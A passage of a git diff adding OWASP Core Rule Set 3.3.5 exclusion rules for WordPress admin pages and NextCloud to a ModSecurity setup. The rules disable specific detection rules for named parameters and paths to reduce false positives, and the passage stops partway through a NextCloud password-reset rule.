ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:admin_password2,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text" + + +# +# [ User management ] +# + +# Edit logged-in user +SecRule REQUEST_FILENAME "@endsWith /wp-admin/profile.php" \ + "id:9002520,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq update" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ + ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ + ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ + ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ + ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ + ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ + ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ + ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ + ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + +# Edit user +SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-edit.php" \ + "id:9002530,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq update" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetById=931130;ARGS:facebook,\ + ctl:ruleRemoveTargetById=931130;ARGS:instagram,\ + ctl:ruleRemoveTargetById=931130;ARGS:linkedin,\ + ctl:ruleRemoveTargetById=931130;ARGS:myspace,\ + ctl:ruleRemoveTargetById=931130;ARGS:pinterest,\ + ctl:ruleRemoveTargetById=931130;ARGS:soundcloud,\ + ctl:ruleRemoveTargetById=931130;ARGS:tumblr,\ + ctl:ruleRemoveTargetById=931130;ARGS:youtube,\ + ctl:ruleRemoveTargetById=931130;ARGS:wikipedia,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + +# Create user +SecRule REQUEST_FILENAME "@endsWith /wp-admin/user-new.php" \ + "id:9002540,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq createuser" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=931130;ARGS:url,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass2" + + +# +# [ General exclusions ] +# + +# _wp_http_referer and wp_http_referer are passed on a lot of wp-admin pages +SecAction \ + "id:9002600,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=920230;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=931130;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=932150;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=941100;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=942130;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=942200;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=942260;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=942431;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=942440;ARGS:_wp_http_referer,\ + ctl:ruleRemoveTargetById=920230;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=931130;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=932150;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=941100;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=942130;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=942200;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=942260;ARGS:wp_http_referer,\ + ctl:ruleRemoveTargetById=942431;ARGS:wp_http_referer,\ + ver:'OWASP_CRS/3.3.5'" + +# +# [ Content editing ] +# + +# Edit posts and pages +# /wp-admin/post.php, /wp-admin/post.php?t=[timestamp] +# - Themes do not properly escape post_title in HTML, so beware of XSS +# and be conservative in excluding this parameter. +# - Parameter _wp_http_referer can appear multiple times. +SecRule REQUEST_FILENAME "@endsWith /wp-admin/post.php" \ + "id:9002700,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@rx ^(?:edit|editpost)$" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:post_title,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:content,\ + ctl:ruleRemoveById=920272,\ + ctl:ruleRemoveById=921180" + +# Autosave posts and pages +# ARGS_NAMES:data[wp-check-locked-posts][] can appear multiple times +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002710,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq heartbeat" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:data[wp_autosave][post_title],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:data[wp_autosave][content],\ + ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][post_id],\ + ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-refresh-post-lock][lock],\ + ctl:ruleRemoveTargetById=942431;ARGS_NAMES:data[wp-check-locked-posts][],\ + ctl:ruleRemoveById=921180,\ + ctl:ruleRemoveById=920272" + +# Edit menus +SecRule REQUEST_FILENAME "@endsWith /wp-admin/nav-menus.php" \ + "id:9002720,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq update" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=942460;ARGS:menu-name,\ + ctl:ruleRemoveTargetById=941330;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=941340;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942200;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942260;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942330;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942340;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942430;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942431;ARGS:nav-menu-data,\ + ctl:ruleRemoveTargetById=942460;ARGS:nav-menu-data" + +# Edit text widgets (can contain custom HTML) +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002730,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@rx ^(?:save-widget|update-widget)$" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[0][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[1][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[2][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[3][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[4][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[5][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[6][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[7][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[8][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[9][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[10][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[11][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[12][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[13][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[14][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[15][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[16][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[17][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[18][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[19][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[20][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[21][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[22][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[23][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[24][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[25][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[26][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[27][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[28][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[29][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[30][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[31][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[32][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[33][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[34][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[35][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[36][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[37][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[38][text],\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:widget-text[39][text]" + +# Reorder widgets +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002740,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq widgets-order" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-1],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-1],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-2],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-2],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-3],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-3],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-4],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-4],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-5],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-5],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-6],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-6],\ + ctl:ruleRemoveTargetById=942430;ARGS:sidebars[sidebar-7],\ + ctl:ruleRemoveTargetById=942431;ARGS:sidebars[sidebar-7]" + +# Create permalink sample for new post +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002750,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq sample-permalink" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=attack-sqli;ARGS:new_title" + +# Add external link to menu +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002760,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq add-menu-item" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=931130;ARGS:menu-item[-1][menu-item-url]" + +# Editor: Add Media, Insert Media, Insert into page +SecRule REQUEST_FILENAME "@endsWith /wp-admin/admin-ajax.php" \ + "id:9002770,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq send-attachment-to-editor" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:html" + + +# +# [ Options and Settings ] +# + +# Change site URL +SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ + "id:9002800,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:option_page "@streq general" \ + "t:none,\ + chain" + SecRule &ARGS:option_page "@eq 1" \ + "t:none,\ + chain" + SecRule ARGS:action "@streq update" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetById=931130;ARGS:home,\ + ctl:ruleRemoveTargetById=931130;ARGS:siteurl" + +# Permalink settings +# permalink_structure=/index.php/%year%/%monthnum%/%day%/%postname%/ +SecRule REQUEST_FILENAME "@endsWith /wp-admin/options-permalink.php" \ + "id:9002810,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=920230;ARGS:selection,\ + ctl:ruleRemoveTargetById=920272;ARGS:selection,\ + ctl:ruleRemoveTargetById=942431;ARGS:selection,\ + ctl:ruleRemoveTargetById=920230;ARGS:permalink_structure,\ + ctl:ruleRemoveTargetById=920272;ARGS:permalink_structure,\ + ctl:ruleRemoveTargetById=942431;ARGS:permalink_structure,\ + ctl:ruleRemoveTargetById=920272;REQUEST_BODY,\ + ver:'OWASP_CRS/3.3.5'" + +# Comments blacklist and moderation list +SecRule REQUEST_FILENAME "@endsWith /wp-admin/options.php" \ + "id:9002820,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:option_page "@streq discussion" \ + "t:none,\ + chain" + SecRule &ARGS:option_page "@eq 1" \ + "t:none,\ + chain" + SecRule ARGS:action "@streq update" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:blacklist_keys,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:moderation_keys" + +# Posts/pages overview search +SecRule REQUEST_FILENAME "@endsWith /wp-admin/edit.php" \ + "id:9002830,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:s,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Helpers ] +# + +# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, +# admin-bar,wp-ajax-response,jquery-color,wp-lists,quicktags, +# jquery-query,admin-comments,svg-painter,heartbeat,&load%5B%5D= +# wp-auth-check,wp-a11y,wplink,jquery-ui-core,jquery-ui-widget, +# jquery-ui-position,jquery-ui-menu,jquery-ui-autocomplete&ver=4.6.1 +# +# /wp-admin/load-styles.php?c=0&dir=ltr&load%5B%5D=dashicons, +# admin-bar,buttons,media-views,common,forms,admin-menu,dashboard, +# list-tables,edit,revisions,media,themes,about,nav-menu&load%5B%5D= +# s,widgets,site-icon,l10n,wp-auth-check&ver=4.6.1 +# +# /wp-admin/load-scripts.php?c=0&load%5B%5D=hoverIntent,common, +# admin-bar,jquery-ui-widget,jquery-ui-position,wp-pointer, +# wp-ajax-response,jquery-color,wp-lists,quicktags, +# jqu&load%5B%5D=ery-query,admin-comments,jquery-ui-core, +# jquery-ui-mouse,jquery-ui-sortable,postbox,dashboard,underscore, +# customize-base,customize&load%5B%5D=-loader,thickbox,plugin-install, +# wp-util,wp-a11y,updates,shortcode,media-upload,svg-painter, +# jquery-ui-accordion&ver=3f9999390861a0133beda3ee8acf152e +SecRule REQUEST_FILENAME "@rx /wp-admin/load-(?:scripts|styles)\.php$" \ + "id:9002900,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=921180,\ + ctl:ruleRemoveTargetById=920273;ARGS_NAMES:load[],\ + ctl:ruleRemoveTargetById=942432;ARGS_NAMES:load[],\ + ctl:ruleRemoveTargetById=942360;ARGS:load[],\ + ctl:ruleRemoveTargetById=942430;ARGS:load[],\ + ctl:ruleRemoveTargetById=942431;ARGS:load[],\ + ctl:ruleRemoveTargetById=942432;ARGS:load[],\ + ver:'OWASP_CRS/3.3.5'" + + +SecMarker "END-WORDPRESS-ADMIN" + + +SecMarker "END-WORDPRESS" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf new file mode 100644 index 000000000..3b63b47e2 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-903.9003-NEXTCLOUD-EXCLUSION-RULES.conf @@ -0,0 +1,416 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# +# ------------------------------------------------------------------------ + +# These exclusions remedy false positives in a default NextCloud install. +# They will likely work with OwnCloud too, but you may have to modify them. +# The exclusions are only active if crs_exclusions_nextcloud=1 is set. +# See rule 900130 in crs-setup.conf.example for instructions. +# +# To relax upload restrictions for only the php files that need it, +# you put something like this in crs-setup.conf: +# +# SecRule REQUEST_FILENAME "@rx /(?:remote.php|index.php)/" \ +# "id:9003330,\ +# phase:1,\ +# t:none,\ +# nolog,\ +# pass,\ +# tx.restricted_extensions='.bak/ .config/ .conf/'" +# +# Large uploads can be modified with SecRequestBodyLimit. Or they +# can be more controlled by using the following: +# +# SecRule REQUEST_URI "@endsWith /index.php/apps/files/ajax/upload.php" \ +# "id:9003610,\ +# phase:1,\ +# t:none,\ +# nolog,\ +# ctl:requestBodyLimit=1073741824" +# +# --------------------- + + +SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ + "id:9003000,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-NEXTCLOUD" + +SecRule &TX:crs_exclusions_nextcloud|TX:crs_exclusions_nextcloud "@eq 0" \ + "id:9003001,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + skipAfter:END-NEXTCLOUD" + + +# +# [ File Manager ] +# +# +# The web interface uploads files, and interacts with the user. + +SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ + "id:9003100,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveByTag=attack-injection-php,\ + ctl:ruleRemoveById=941000-942999,\ + ctl:ruleRemoveById=951000-951999,\ + ctl:ruleRemoveById=953100-953130,\ + ctl:ruleRemoveById=920420,\ + ctl:ruleRemoveById=920440,\ + ver:'OWASP_CRS/3.3.5'" + +# Skip PUT parsing for invalid encoding / protocol violations in binary files. + +SecRule REQUEST_METHOD "@streq PUT" \ + "id:9003105,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_FILENAME "@contains /remote.php/webdav" \ + "t:none,\ + ctl:ruleRemoveById=920000-920999,\ + ctl:ruleRemoveById=932000-932999,\ + ctl:ruleRemoveById=921150,\ + ctl:ruleRemoveById=930110,\ + ctl:ruleRemoveById=930120" + +# Allow the data type 'text/vcard' + +SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ + "id:9003110,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" + +# Allow the data type 'application/octet-stream' + +SecRule REQUEST_METHOD "@rx ^(?:PUT|MOVE)$" \ + "id:9003115,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_FILENAME "@rx /remote\.php/dav/(?:files|uploads)/" \ + "setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |application/octet-stream|'" + +# Allow data types like video/mp4 + +SecRule REQUEST_METHOD "@streq PUT" \ + "id:9003116,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule REQUEST_FILENAME "@rx (?:/public\.php/webdav/|/remote\.php/dav/uploads/)" \ + "ctl:ruleRemoveById=920340,\ + ctl:ruleRemoveById=920420" + + +# Allow characters like /../ in files. +# Allow all kind of filetypes. +# Allow source code. + +SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ + "id:9003120,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=930100-930110,\ + ctl:ruleRemoveById=951000-951999,\ + ctl:ruleRemoveById=953100-953130,\ + ctl:ruleRemoveById=920440,\ + ver:'OWASP_CRS/3.3.5'" + +# Allow REPORT requests without Content-Type header (at least the iOS app does this) + +SecRule REQUEST_METHOD "@streq REPORT" \ + "id:9003121,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + chain" + SecRule REQUEST_FILENAME "@contains /remote.php/dav/files/" \ + "t:none,\ + ctl:ruleRemoveById=920340" + + +# [ Searchengine ] +# +# NexCloud uses a search field for filename or content queries. + +SecRule REQUEST_FILENAME "@contains /index.php/core/search" \ + "id:9003125,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=attack-injection-php;ARGS:query,\ + ctl:ruleRemoveTargetById=941000-942999;ARGS:query,\ + ctl:ruleRemoveTargetById=932000-932999;ARGS:query,\ + ver:'OWASP_CRS/3.3.5'" + + +# [ DAV ] +# +# NextCloud uses DAV methods with index.php and remote.php to do many things +# The default ones in ModSecurity are: GET HEAD POST OPTIONS +# +# Looking through the code, and via testing, I found these: +# +# File manager: PUT DELETE MOVE PROPFIND PROPPATCH +# Calendars: REPORT +# Others in the code or js files: PATCH MKCOL MOVE TRACE +# Others that I added just in case, and they seem related: +# CHECKOUT COPY LOCK MERGE MKACTIVITY UNLOCK. + +SecRule REQUEST_FILENAME "@rx /(?:remote|index|public)\.php/" \ + "id:9003130,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT PATCH CHECKOUT COPY DELETE LOCK MERGE MKACTIVITY MKCOL MOVE PROPFIND PROPPATCH UNLOCK REPORT TRACE jsonp'" + + +# We need to allow DAV methods for sharing files, and removing shares +# DELETE - when the share is removed +# PUT - when setting a password / expiration time + +SecRule REQUEST_FILENAME "@rx /ocs/v[0-9]+\.php/apps/files_sharing/" \ + "id:9003140,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_methods=%{tx.allowed_methods} PUT DELETE'" + + +# [ Preview and Thumbnails ] + +SecRule REQUEST_FILENAME "@contains /index.php/core/preview.png" \ + "id:9003150,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=932150;ARGS:file,\ + ver:'OWASP_CRS/3.3.5'" + +# Filepreview for trashbin + +SecRule REQUEST_FILENAME "@contains /index.php/apps/files_trashbin/ajax/preview.php" \ + "id:9003155,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=932150;ARGS:file,\ + ctl:ruleRemoveTargetById=942190;ARGS:file,\ + ver:'OWASP_CRS/3.3.5'" + +SecRule REQUEST_FILENAME "@rx /index\.php/(?:apps/gallery/thumbnails|logout$)" \ + "id:9003160,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=941120;ARGS:requesttoken,\ + ver:'OWASP_CRS/3.3.5'" + + +# [ Ownnote ] + +SecRule REQUEST_FILENAME "@contains /index.php/apps/ownnote/" \ + "id:9003300,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=941150,\ + ver:'OWASP_CRS/3.3.5'" + + +# [ Text Editor ] +# +# This file can save anything, and it's name could be lots of things. + +SecRule REQUEST_FILENAME "@contains /index.php/apps/files_texteditor/" \ + "id:9003310,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:filecontents,\ + ctl:ruleRemoveTargetById=921110-921160;ARGS:filecontents,\ + ctl:ruleRemoveTargetById=932150;ARGS:filename,\ + ctl:ruleRemoveTargetById=920370-920390;ARGS:filecontents,\ + ctl:ruleRemoveTargetById=920370-920390;ARGS_COMBINED_SIZE,\ + ver:'OWASP_CRS/3.3.5'" + + +# [ Address Book ] +# +# Allow the data type 'text/vcard' + +SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ + "id:9003320,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/vcard|'" + +# Allow modifying contacts via the web interface +SecRule REQUEST_METHOD "@streq PUT" \ + "id:9003321,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + chain" + SecRule REQUEST_FILENAME "@contains /remote.php/dav/addressbooks/" \ + "t:none,\ + ctl:ruleRemoveById=200002" + + +# [ Calendar ] +# +# Allow the data type 'text/calendar' + +SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ + "id:9003330,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + setvar:'tx.allowed_request_content_type=%{tx.allowed_request_content_type} |text/calendar|'" + +# Allow modifying calendar events via the web interface +SecRule REQUEST_METHOD "@streq PUT" \ + "id:9003331,\ + phase:1,\ + pass,\ + t:none,\ + nolog,\ + chain" + SecRule REQUEST_FILENAME "@contains /remote.php/dav/calendars/" \ + "t:none,\ + ctl:ruleRemoveById=200002" + + +# [ Notes ] +# +# We want to allow a lot of things as the user is +# allowed to note on anything. + +SecRule REQUEST_FILENAME "@contains /index.php/apps/notes/" \ + "id:9003340,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveByTag=attack-injection-php,\ + ver:'OWASP_CRS/3.3.5'" + + +# [ Bookmarks ] +# +# Allow urls in data. + +SecRule REQUEST_FILENAME "@contains /index.php/apps/bookmarks/" \ + "id:9003350,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveById=931130,\ + ver:'OWASP_CRS/3.3.5'" + + +# +# [ Login forms ] +# + +# This removes checks on the 'password' and related fields: + +# User login password. + +SecRule REQUEST_FILENAME "@contains /index.php/login" \ + "id:9003400,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ctl:ruleRemoveTargetById=941100;ARGS:requesttoken,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:password,\ + ver:'OWASP_CRS/3.3.5'" + +# Reset password. + +SecRule REQUEST_FILENAME "@endsWith /index.php/login" \ + "id:9003410,\ + phase:2,\ + pass,\ + t:none,\ + nolog,\ + ver:'OWASP_CRS/3.3.5',\ + chain" + SecRule ARGS:action "@streq resetpass" \ + "t:none,\ + chain" + SecRule &ARGS:action "@eq 1" \ + "t:none,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1,\ + ctl:ruleRemoveTargetByTag=OWASP_CRS;ARGS:pass1-text,\ + 